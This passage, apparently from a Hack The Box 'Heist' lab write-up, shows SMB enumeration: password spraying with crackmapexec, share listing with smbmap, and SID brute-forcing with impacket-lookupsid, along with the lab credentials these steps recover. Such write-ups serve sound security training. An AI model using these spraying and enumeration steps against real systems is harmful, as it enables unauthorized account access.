SMB
Nmap revealed an SMB server listening on the target port 445
smbclient
┌──(kali㉿kali)-[~/archive/htb/labs/heist]
└─$ smbclient -L //$IP/
Password for [WORKGROUP\kali]:
session setup failed: NT_STATUS_ACCESS_DENIED
Anonymous Login is not allowed.
crackmapexec
┌──(kali㉿kali)-[~/archive/htb/labs/heist]
└─$ crackmapexec smb $IP -u users -p passwd --continue-on-success
smb 10.10.10.149 445 supportdesk [*] windows 10.0 build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
smb 10.10.10.149 445 supportdesk [+] supportdesk\hazard:stealth1agent
smb 10.10.10.149 445 supportdesk [-] supportdesk\hazard:$uperP@ssword STATUS_LOGON_FAILURE
smb 10.10.10.149 445 supportdesk [-] supportdesk\hazard:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
smb 10.10.10.149 445 supportdesk [-] supportdesk\support:stealth1agent STATUS_LOGON_FAILURE
smb 10.10.10.149 445 supportdesk [-] supportdesk\support:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
smb 10.10.10.149 445 supportdesk [-] supportdesk\support:$uperP@ssword STATUS_LOGON_FAILURE
smb 10.10.10.149 445 supportdesk [-] supportdesk\rout3r:stealth1agent STATUS_LOGON_FAILURE
smb 10.10.10.149 445 supportdesk [-] supportdesk\rout3r:$uperP@ssword STATUS_LOGON_FAILURE
smb 10.10.10.149 445 supportdesk [-] supportdesk\rout3r:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
smb 10.10.10.149 445 supportdesk [-] supportdesk\admin:stealth1agent STATUS_LOGON_FAILURE
smb 10.10.10.149 445 supportdesk [-] supportdesk\admin:$uperP@ssword STATUS_LOGON_FAILURE
smb 10.10.10.149 445 supportdesk [-] supportdesk\admin:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
I got one hit
supportdesk\hazard:stealth1agent
This is a valid system credential.
I can also see that supportdesk is the hostname of the target system
smbmap
┌──(kali㉿kali)-[~/archive/htb/labs/heist]
└─$ smbmap -H $IP -u 'hazard' -p 'stealth1agent'
[+] IP: 10.10.10.149:445 Name: 10.10.10.149
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPCI am able to sign-in to the target SMB server.
There are only the default SMB share
The hazard user has READ-ONLY access to the IPC$ share
impacket-lookupsid
impacket-lookupsid is an excellent tool to enumerate user via the IPC$ share on the SMB server.
Some believe that this tool is only for Active Directory, but that is not true as it only requires read access to IPC$ share
The only downside is that it makes a lot of noises on the traffic
┌──(kali㉿kali)-[~/archive/htb/labs/heist]
└─$ impacket-lookupsid hazard:stealth1agent@$IP -target-ip $IP
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Brute forcing SIDs at 10.10.10.149
[*] stringbinding ncacn_np:10.10.10.149[\pipe\lsarpc]
[*] domain sid is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)I was able to enumerated 2 additional users
ChaseJason
crackmapexec
Since I just got 2 additional valid system users, I have to test out the passwords against them
┌──(kali㉿kali)-[~/archive/htb/labs/heist]
└─$ crackmapexec smb $IP -u users -p passwd --continue-on-success
SMB 10.10.10.149 445 SUPPORTDESK [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\administrator:stealth1agent STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\administrator:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\administrator:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [+] SupportDesk\Hazard:stealth1agent
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\Hazard:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\Hazard:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\support:stealth1agent STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\support:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\support:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\Chase:stealth1agent STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\Chase:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [+] SupportDesk\Chase:Q4)sJu\Y8qz*A3?d
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\Jason:stealth1agent STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\Jason:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\Jason:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\rout3r:stealth1agent STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\rout3r:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\rout3r:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\admin:stealth1agent STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\admin:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\admin:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE A new system credential VALIDATED; SupportDesk\Chase:Q4)sJu\Y8qz*A3?d